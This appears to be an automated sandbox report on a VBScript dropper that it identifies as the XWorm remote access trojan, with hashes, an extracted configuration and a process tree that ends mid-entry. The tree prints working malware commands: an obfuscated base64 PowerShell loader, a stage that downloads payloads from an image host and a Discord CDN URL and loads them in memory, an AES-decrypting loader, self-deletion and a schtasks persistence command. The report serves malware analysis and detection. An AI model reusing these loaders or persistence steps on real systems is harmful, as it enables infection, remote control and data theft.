Analysis

  • max time kernel
    142s
  • max time network
    150s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240226-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system
  • submitted
    05-04-2024 11:45

General

  • Target

    logo/receipt.vbs

  • Size

    4KB

  • MD5

    22d736ac0bfacea4d23dbaf9412d329a

  • SHA1

    b2990e0c9f9549b1f8cc3dceec47663b975cbb36

  • SHA256

    c5a2fd9c057765f6eb2bde2cc86317b53d8418117c9e1362596e067b44ea7d04

  • SHA512

    bfdd54f8e400e9c516cf5c73f1ba17b2a5c44fe9d14ada37efaff35c38d30c7849ad1dfb32a3d877742631a60c462832e079994de5fe65044a2941eaa0770904

  • SSDEEP

    96:LQUUjcFSoSqUnPkPKOTK6yjbo+yHQUJ8fLGZ2k7:dYcFh5UsPKOTJcoLMw2k7

Malware Config

Extracted

Family

xworm

Version

5.0

Mutex

UxOlPOZZNwNV9srk

Attributes
  • install_file

    USB.exe

  • pastebin_url

    https://pastebin.com/raw/Dh8E7H3R

aes.plain

Extracted

Family

xworm

Version

3.1

Attributes
  • Install_directory

    %AppData%

  • install_file

    USB.exe

  • pastebin_url

    https://pastebin.com/raw/Dh8E7H3R

Signatures

  • Detect Xworm Payload 2 IoCs
  • Xworm

    Xworm is a remote access trojan written in C#.

  • Blocklisted process makes network request 5 IoCs
  • Checks computer location settings 2 TTPs 4 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 3 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 21 IoCs
  • Suspicious use of AdjustPrivilegeToken 8 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 33 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\logo\receipt.vbs"
    1⤵
    • Blocklisted process makes network request
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:4780
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTreZDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreCDgTreDgTrePQDgTregDgTreEDgTreDgTreKDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTreaDgTreB1DgTreGYDgTreZgBsDgTreGUDgTreZDgTreBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB8DgTreCDgTreDgTreRwBlDgTreHQDgTreLQBSDgTreGEDgTrebgBkDgTreG8DgTrebQDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreB9DgTreDsDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBDgTreDgTreCgDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDYDgTreMDgTreDgTrevDgTreDDgTreDgTreNDgTreDgTrezDgTreC8DgTreZgB1DgTreGwDgTrebDgTreDgTrevDgTreG4DgTreZQB3DgTreF8DgTreaQBtDgTreGEDgTreZwBlDgTreC4DgTreagBwDgTreGcDgTrePwDgTrexDgTreDcDgTreMQDgTrexDgTreDIDgTreODgTreDgTre3DgTreDgDgTreODgTreDgTre3DgTreCcDgTreLDgTreDgTregDgTreCcDgTreaDgTreB0DgTreHQDgTrecDgTreBzDgTreDoDgTreLwDgTrevDgTreHUDgTrecDgTreBsDgTreG8DgTreYQBkDgTreGQDgTreZQBpDgTreG0DgTreYQBnDgTreGUDgTrebgBzDgTreC4DgTreYwBvDgTreG0DgTreLgBiDgTreHIDgTreLwBpDgTreG0DgTreYQBnDgTreGUDgTrecwDgTrevDgTreDDgTreDgTreMDgTreDgTre0DgTreC8DgTreNwDgTre2DgTreDDgTreDgTreLwDgTrewDgTreDQDgTreNDgTreDgTrevDgTreG8DgTrecgBpDgTreGcDgTreaQBuDgTreGEDgTrebDgTreDgTrevDgTreG4DgTreZQB3DgTreF8DgTreaQBtDgTreGEDgTreZwBlDgTreC4DgTreagBwDgTreGcDgTrePwDgTrexDgTreDcDgTreMQDgTrexDgTreDIDgTreODgTreDgTre3DgTreDgDgTreODgTreDgTre4DgTreCcDgTreKQDgTre7DgTreCDgTreDgTreJDgTreBpDgTreG0DgTreYQBnDgTreGUDgTreQgB5DgTreHQDgTreZQBzDgTreCDgTreDgTrePQDgTregDgTreEQDgTrebwB3DgTreG4DgTrebDgTreBvDgTreGEDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreEYDgTrecgBvDgTreG0DgTreTDgTreBpDgTreG4DgTreawBzDgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreOwDgTregDgTreGkDgTreZgDgTregDgTreCgDgTreJDgTreBpDgTreG0DgTreYQBnDgTreGUDgTreQgB5DgTreHQDgTreZQBzDgTreCDgTreDgTreLQBuDgTreGUDgTreIDgTreDgTrekDgTreG4DgTredQBsDgTreGwDgTreKQDgTregDgTreHsDgTreIDgTreDgTrekDgTreGkDgTrebQBhDgTreGcDgTreZQBUDgTreGUDgTreeDgTreB0DgTreCDgTreDgTrePQDgTregDgTreFsDgTreUwB5DgTreHMDgTredDgTreBlDgTreG0DgTreLgBUDgTreGUDgTreeDgTreB0DgTreC4DgTreRQBuDgTreGMDgTrebwBkDgTreGkDgTrebgBnDgTreF0DgTreOgDgTre6DgTreFUDgTreVDgTreBGDgTreDgDgTreLgBHDgTreGUDgTredDgTreBTDgTreHQDgTrecgBpDgTreG4DgTreZwDgTreoDgTreCQDgTreaQBtDgTreGEDgTreZwBlDgTreEIDgTreeQB0DgTreGUDgTrecwDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBGDgTreGwDgTreYQBnDgTreCDgTreDgTrePQDgTregDgTreCcDgTrePDgTreDgTre8DgTreEIDgTreQQBTDgTreEUDgTreNgDgTre0DgTreF8DgTreUwBUDgTreEEDgTreUgBUDgTreD4DgTrePgDgTrenDgTreDsDgTreIDgTreDgTrekDgTreGUDgTrebgBkDgTreEYDgTrebDgTreBhDgTreGcDgTreIDgTreDgTre9DgTreCDgTreDgTreJwDgTre8DgTreDwDgTreQgBBDgTreFMDgTreRQDgTre2DgTreDQDgTreXwBFDgTreE4DgTreRDgTreDgTre+DgTreD4DgTreJwDgTre7DgTreCDgTreDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreSQBuDgTreGQDgTreZQB4DgTreCDgTreDgTrePQDgTregDgTreCQDgTreaQBtDgTreGEDgTreZwBlDgTreFQDgTreZQB4DgTreHQDgTreLgBJDgTreG4DgTreZDgTreBlDgTreHgDgTreTwBmDgTreCgDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreRgBsDgTreGEDgTreZwDgTrepDgTreDsDgTreIDgTreDgTrekDgTreGUDgTrebgBkDgTreEkDgTrebgBkDgTreGUDgTreeDgTreDgTregDgTreD0DgTreIDgTreDgTrekDgTreGkDgTrebQBhDgTreGcDgTreZQBUDgTreGUDgTreeDgTreB0DgTreC4DgTreSQBuDgTreGQDgTreZQB4DgTreE8DgTreZgDgTreoDgTreCQDgTreZQBuDgTreGQDgTreRgBsDgTreGEDgTreZwDgTrepDgTreDsDgTreIDgTreBpDgTreGYDgTreIDgTreDgTreoDgTreCQDgTrecwB0DgTreGEDgTrecgB0DgTreEkDgTrebgBkDgTreGUDgTreeDgTreDgTregDgTreC0DgTreZwBlDgTreCDgTreDgTreMDgTreDgTregDgTreC0DgTreYQBuDgTreGQDgTreIDgTreDgTrekDgTreGUDgTrebgBkDgTreEkDgTrebgBkDgTreGUDgTreeDgTreDgTregDgTreC0DgTreZwB0DgTreCDgTreDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreSQBuDgTreGQDgTreZQB4DgTreCkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreSQBuDgTreGQDgTreZQB4DgTreCDgTreDgTreKwDgTre9DgTreCDgTreDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreRgBsDgTreGEDgTreZwDgTreuDgTreEwDgTreZQBuDgTreGcDgTredDgTreBoDgTreDsDgTreIDgTreDgTrekDgTreGIDgTreYQBzDgTreGUDgTreNgDgTre0DgTreEwDgTreZQBuDgTreGcDgTredDgTreBoDgTreCDgTreDgTrePQDgTregDgTreCQDgTreZQBuDgTreGQDgTreSQBuDgTreGQDgTreZQB4DgTreCDgTreDgTreLQDgTregDgTreCQDgTrecwB0DgTreGEDgTrecgB0DgTreEkDgTrebgBkDgTreGUDgTreeDgTreDgTre7DgTreCDgTreDgTreJDgTreBiDgTreGEDgTrecwBlDgTreDYDgTreNDgTreBDDgTreG8DgTrebQBtDgTreGEDgTrebgBkDgTreCDgTreDgTrePQDgTregDgTreCQDgTreaQBtDgTreGEDgTreZwBlDgTreFQDgTreZQB4DgTreHQDgTreLgBTDgTreHUDgTreYgBzDgTreHQDgTrecgBpDgTreG4DgTreZwDgTreoDgTreCQDgTrecwB0DgTreGEDgTrecgB0DgTreEkDgTrebgBkDgTreGUDgTreeDgTreDgTresDgTreCDgTreDgTreJDgTreBiDgTreGEDgTrecwBlDgTreDYDgTreNDgTreBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreGMDgTrebwBtDgTreG0DgTreYQBuDgTreGQDgTreQgB5DgTreHQDgTreZQBzDgTreCDgTreDgTrePQDgTregDgTreFsDgTreUwB5DgTreHMDgTredDgTreBlDgTreG0DgTreLgBDDgTreG8DgTrebgB2DgTreGUDgTrecgB0DgTreF0DgTreOgDgTre6DgTreEYDgTrecgBvDgTreG0DgTreQgBhDgTreHMDgTreZQDgTre2DgTreDQDgTreUwB0DgTreHIDgTreaQBuDgTreGcDgTreKDgTreDgTrekDgTreGIDgTreYQBzDgTreGUDgTreNgDgTre0DgTreEMDgTrebwBtDgTreG0DgTreYQBuDgTreGQDgTreKQDgTre7DgTreCDgTreDgTreJDgTreBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBBDgTreHMDgTrecwBlDgTreG0DgTreYgBsDgTreHkDgTreIDgTreDgTre9DgTreCDgTreDgTreWwBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreFIDgTreZQBmDgTreGwDgTreZQBjDgTreHQDgTreaQBvDgTreG4DgTreLgBBDgTreHMDgTrecwBlDgTreG0DgTreYgBsDgTreHkDgTreXQDgTre6DgTreDoDgTreTDgTreBvDgTreGEDgTreZDgTreDgTreoDgTreCQDgTreYwBvDgTreG0DgTrebQBhDgTreG4DgTreZDgTreBCDgTreHkDgTredDgTreBlDgTreHMDgTreKQDgTre7DgTreCDgTreDgTreJDgTreB0DgTreHkDgTrecDgTreBlDgTreCDgTreDgTrePQDgTregDgTreCQDgTrebDgTreBvDgTreGEDgTreZDgTreBlDgTreGQDgTreQQBzDgTreHMDgTreZQBtDgTreGIDgTrebDgTreB5DgTreC4DgTreRwBlDgTreHQDgTreVDgTreB5DgTreHDgTreDgTreZQDgTreoDgTreCcDgTreUDgTreBSDgTreE8DgTreSgBFDgTreFQDgTreTwBBDgTreFUDgTreVDgTreBPDgTreE0DgTreQQBDDgTreEEDgTreTwDgTreuDgTreFYDgTreQgDgTreuDgTreEgDgTrebwBtDgTreGUDgTreJwDgTrepDgTreDsDgTreIDgTreDgTrekDgTreG0DgTreZQB0DgTreGgDgTrebwBkDgTreCDgTreDgTrePQDgTregDgTreCQDgTredDgTreB5DgTreHDgTreDgTreZQDgTreuDgTreEcDgTreZQB0DgTreE0DgTreZQB0DgTreGgDgTrebwBkDgTreCgDgTreJwBWDgTreEEDgTreSQDgTrenDgTreCkDgTreLgBJDgTreG4DgTredgBvDgTreGsDgTreZQDgTreoDgTreCQDgTrebgB1DgTreGwDgTrebDgTreDgTresDgTreCDgTreDgTreWwBvDgTreGIDgTreagBlDgTreGMDgTredDgTreBbDgTreF0DgTreXQDgTregDgTreCgDgTreJwDgTremDgTreGUDgTreODgTreDgTreyDgTreDEDgTreYwBmDgTreDcDgTreNgBkDgTreGUDgTreYgBiDgTreDUDgTreYQDgTrezDgTreDYDgTreNwBiDgTreDQDgTreZDgTreDgTrewDgTreGMDgTreMQDgTrexDgTreGYDgTreNwDgTrewDgTreDIDgTreMDgTreDgTre4DgTreGIDgTreZgBjDgTreDYDgTreYwBiDgTreDQDgTreNDgTreDgTre5DgTreDYDgTreZQDgTre0DgTreDEDgTreODgTreBmDgTreDIDgTreYQDgTre4DgTreDcDgTreZDgTreDgTrezDgTreDMDgTreNDgTreDgTre3DgTreGMDgTreNgDgTre0DgTreDIDgTreNDgTreDgTre3DgTreDDgTreDgTreZQDgTre5DgTreGQDgTrePQBtDgTreGgDgTreJgDgTrewDgTreGUDgTreZDgTreDgTre0DgTreGMDgTreMDgTreDgTre2DgTreDYDgTrePQBzDgTreGkDgTreJgDgTrewDgTreGUDgTreMgBjDgTreGUDgTreMQDgTre2DgTreDYDgTrePQB4DgTreGUDgTrePwB0DgTreHgDgTredDgTreDgTreuDgTreGQDgTrebwBvDgTreGgDgTreLwDgTre4DgTreDcDgTreMDgTreDgTrewDgTreDkDgTreNDgTreDgTrezDgTreDYDgTreMgDgTrezDgTreDDgTreDgTreMQDgTre3DgTreDgDgTreNwDgTre0DgTreDIDgTreMgDgTrexDgTreC8DgTreOQDgTrezDgTreDgDgTreMwDgTrewDgTreDDgTreDgTreNQDgTre2DgTreDUDgTreNwDgTre5DgTreDIDgTreODgTreDgTrewDgTreDYDgTreMQDgTre4DgTreDEDgTreMQDgTrevDgTreHMDgTredDgTreBuDgTreGUDgTrebQBoDgTreGMDgTreYQB0DgTreHQDgTreYQDgTrevDgTreG0DgTrebwBjDgTreC4DgTrecDgTreBwDgTreGEDgTreZDgTreByDgTreG8DgTreYwBzDgTreGkDgTreZDgTreDgTreuDgTreG4DgTreZDgTreBjDgTreC8DgTreLwDgTre6DgTreHMDgTrecDgTreB0DgTreHQDgTreaDgTreDgTrenDgTreCDgTreDgTreLDgTreDgTregDgTreCcDgTreZDgTreBlDgTreHMDgTreYQB0DgTreGkDgTredgBhDgTreGQDgTrebwDgTrenDgTreCDgTreDgTreLDgTreDgTregDgTreCcDgTreZDgTreBlDgTreHMDgTreYQB0DgTreGkDgTredgBhDgTreGQDgTrebwDgTrenDgTreCDgTreDgTreLDgTreDgTregDgTreCcDgTreZDgTreBlDgTreHMDgTreYQB0DgTreGkDgTredgBhDgTreGQDgTrebwDgTrenDgTreCwDgTreJwBBDgTreGQDgTreZDgTreBJDgTreG4DgTreUDgTreByDgTreG8DgTreYwBlDgTreHMDgTrecwDgTrezDgTreDIDgTreJwDgTresDgTreCcDgTreJwDgTrepDgTreCkDgTrefQDgTregDgTreH0DgTre';$oWjuxd = [system.Text.encoding]::Unicode.GetString([system.convert]::Frombase64string( $codigo.replace('DgTre','A') ));powershell.exe -windowstyle hidden -executionpolicy bypass -Noprofile -command $OWjuxD"
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:868
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/760/043/full/new_image.jpg?1711287887', 'https://uploaddeimagens.com.br/images/004/760/044/original/new_image.jpg?1711287888'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('&e821cf76debb5a367b4d0c11f70208bfc6cb4496e418f2a87d3347c642470e9d=mh&0ed4c066=si&0e2ce166=xe?txt.dooh/8700943623017874221/9383005657928061811/stnemhcatta/moc.ppadrocsid.ndc//:sptth' , 'desativado' , 'desativado' , 'desativado','AddInProcess32',''))} }"
        3⤵
        • Blocklisted process makes network request
        • Suspicious use of SetThreadContext
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:1564
        • C:\Windows\Microsoft.Net\Framework\v4.0.30319\AddInProcess32.exe
          "C:\Windows\Microsoft.Net\Framework\v4.0.30319\AddInProcess32.exe"
          4⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of SetWindowsHookEx
          • Suspicious use of WriteProcessMemory
          PID:64
          • C:\Windows\SysWOW64\cmd.exe
            C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\iwebbh.bat" "
            5⤵
            • Suspicious use of WriteProcessMemory
            PID:2688
            • C:\Windows\SysWOW64\cmd.exe
              C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\iwebbh.bat"
              6⤵
              • Suspicious use of WriteProcessMemory
              PID:4324
              • C:\Users\Admin\AppData\Local\Temp\iwebbh.bat.exe
                "C:\Users\Admin\AppData\Local\Temp\iwebbh.bat.exe" -w hidden -c $ZiYB='TWHQYraWHQYnsWHQYfoWHQYrmFiWHQYnalWHQYBloWHQYckWHQY'.Replace('WHQY', '');$TWWf='CreWHQYateWHQYDeWHQYcryWHQYptWHQYorWHQY'.Replace('WHQY', '');$JFEq='LoWHQYadWHQY'.Replace('WHQY', '');$PgsW='GetWHQYCuWHQYrWHQYreWHQYntWHQYPrWHQYoWHQYceWHQYssWHQY'.Replace('WHQY', '');$tNsL='LaWHQYstWHQY'.Replace('WHQY', '');$GjzR='MaiWHQYnWHQYModuWHQYleWHQY'.Replace('WHQY', '');$aRAn='SpWHQYlitWHQY'.Replace('WHQY', '');$TNHv='IWHQYnWHQYvokWHQYeWHQY'.Replace('WHQY', '');$QZWA='EntWHQYrWHQYyPoWHQYintWHQY'.Replace('WHQY', '');$vNAk='FroWHQYmBaWHQYsWHQYe6WHQY4SWHQYtriWHQYngWHQY'.Replace('WHQY', '');$UYdq='ReWHQYaWHQYdLiWHQYnWHQYeWHQYsWHQY'.Replace('WHQY', '');$JZFz='ChWHQYangWHQYeWHQYExtWHQYensiWHQYoWHQYnWHQY'.Replace('WHQY', '');function swdxJ($huXUQ){$dLULt=[System.Security.Cryptography.Aes]::Create();$dLULt.Mode=[System.Security.Cryptography.CipherMode]::CBC;$dLULt.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$dLULt.Key=[System.Convert]::$vNAk('g+qN2trIRo/tbHFrQCd/eQDgIirzmSlbfVKkYlD3YWc=');$dLULt.IV=[System.Convert]::$vNAk('eff0gny3xfxcI+yMk6XV2Q==');$lfKNS=$dLULt.$TWWf();$QwlmH=$lfKNS.$ZiYB($huXUQ,0,$huXUQ.Length);$lfKNS.Dispose();$dLULt.Dispose();$QwlmH;}function ktBmv($huXUQ){$NioEV=New-Object System.IO.MemoryStream(,$huXUQ);$xipLu=New-Object System.IO.MemoryStream;$BScFk=New-Object System.IO.Compression.GZipStream($NioEV,[IO.Compression.CompressionMode]::Decompress);$BScFk.CopyTo($xipLu);$BScFk.Dispose();$NioEV.Dispose();$xipLu.Dispose();$xipLu.ToArray();}$zaZHN=[System.Linq.Enumerable]::$tNsL([System.IO.File]::$UYdq([System.IO.Path]::$JZFz([System.Diagnostics.Process]::$PgsW().$GjzR.FileName, $null)));$GGCVp=$zaZHN.Substring(2).$aRAn(':');$GwZBd=ktBmv (swdxJ ([Convert]::$vNAk($GGCVp[0])));$gptFX=ktBmv (swdxJ ([Convert]::$vNAk($GGCVp[1])));[System.Reflection.Assembly]::$JFEq([byte[]]$gptFX).$QZWA.$TNHv($null,$null);[System.Reflection.Assembly]::$JFEq([byte[]]$GwZBd).$QZWA.$TNHv($null,$null);
                7⤵
                • Checks computer location settings
                • Executes dropped EXE
                • Adds Run key to start application
                PID:3524
                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $a = [System.Diagnostics.Process]::GetProcessById(3524);$b = $a.MainModule.FileName;$a.WaitForExit();Remove-Item -Force -Path $b;
                  8⤵
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:4272
                • C:\Windows\SysWOW64\schtasks.exe
                  "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "iwebbh" /tr "C:\Users\Admin\AppData\Roaming\iwebbh.bat"
                  8⤵
                  • Creates scheduled task(s)
                  PID:3364
  • C:\Windows\SYSTEM32\cmd.exe
    C:\Windows\SYSTEM32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\iwebbh.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2476
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /K C:\Users\Admin\AppData\Roaming\iwebbh.bat
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2872
      • C:\Users\Admin\AppData\Roaming\iwebbh.bat.exe
        "C:\Users\Admin\AppData\Roaming\iwebbh.bat.exe" -w hidden -c $ZiYB='TWHQYraWHQYnsWHQYfoWHQYrmFiWHQYnalWHQYBloWHQYckWHQY'.Replace('WHQY', '');$TWWf='CreWHQYateWHQYDeWHQYcryWHQYptWHQYorWHQY'.Replace('WHQY', '');$JFEq='LoWHQYadWHQY'.Replace('WHQY', '');$PgsW='GetWHQYCuWHQYrWHQYreWHQYntWHQYPrWHQYoWHQYceWHQYssWHQY'.Replace('WHQY', '');$tNsL='LaWHQYstWHQY'.Replace('WHQY', '');$GjzR='MaiWHQYnWHQYModuWHQYleWHQY'.Replace('WHQY', '');$aRAn='SpWHQYlitWHQY'.Replace('WHQY', '');$TNHv='IWHQYnWHQYvokWHQYeWHQY'.Replace('WHQY', '');$QZWA='EntWHQYrWHQYyPoWHQYintWHQY'.Replace('WHQY', '');$vNAk='FroWHQYmBaWHQYsWHQYe6WHQY4SWHQYtriWHQYngWHQY'.Replace('WHQY', '');$UYdq='ReWHQYaWHQYdLiWHQYnWHQYeWHQYsWHQY'.Replace('WHQY', '');$JZFz='ChWHQYangWHQYeWHQYExtWHQYensiWHQYoWHQYnWHQY'.Replace('WHQY', '');function swdxJ($huXUQ){$dLULt=[System.Security.Cryptography.Aes]::Create();$dLULt.Mode=[System.Security.Cryptography.CipherMode]::CBC;$dLULt.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$dLULt.Key=[System.Convert]::$vNAk('g+qN2trIRo/tbHFrQCd/eQDgIirzmSlbfVKkYlD3YWc=');$dLULt.IV=[System.Convert]::$vNAk('eff0gny3xfxcI+yMk6XV2Q==');$lfKNS=$dLULt.$TWWf();$QwlmH=$lfKNS.$ZiYB($huXUQ,0,$huXUQ.Length);$lfKNS.Dispose();$dLULt.Dispose();$QwlmH;}function ktBmv($huXUQ){$NioEV=New-Object System.IO.MemoryStream(,$huXUQ);$xipLu=New-Object System.IO.MemoryStream;$BScFk=New-Object System.IO.Compression.GZipStream($NioEV,[IO.Compression.CompressionMode]::Decompress);$BScFk.CopyTo($xipLu);$BScFk.Dispose();$NioEV.Dispose();$xipLu.Dispose();$xipLu.ToArray();}$zaZHN=[System.Linq.Enumerable]::$tNsL([System.IO.File]::$UYdq([System.IO.Path]::$JZFz([System.Diagnostics.Process]::$PgsW().$GjzR.FileName, $null)));$GGCVp=$zaZHN.Substring(2).$aRAn(':');$GwZBd=ktBmv (swdxJ ([Convert]::$vNAk($GGCVp[0])));$gptFX=ktBmv (swdxJ ([Convert]::$vNAk($GGCVp[1])));[System.Reflection.Assembly]::$JFEq([byte[]]$gptFX).$QZWA.$TNHv($null,$null);[System.Reflection.Assembly]::$JFEq([byte[]]$GwZBd).$QZWA.$TNHv($null,$null);
        3⤵
        • Checks computer location settings
        • Executes dropped EXE
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:4724
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $a = [System.Diagnostics.Process]::GetProcessById(4724);$b = $a.MainModule.FileName;$a.WaitForExit();Remove-Item -Force -Path $b;
          4⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1672
  • C:\Windows\SYSTEM32\cmd.exe
    C:\Windows\SYSTEM32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\iwebbh.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2792
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /K C:\Users\Admin\AppData\Roaming\iwebbh.bat
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2424
      • C:\Users\Admin\AppData\Roaming\iwebbh.bat.exe
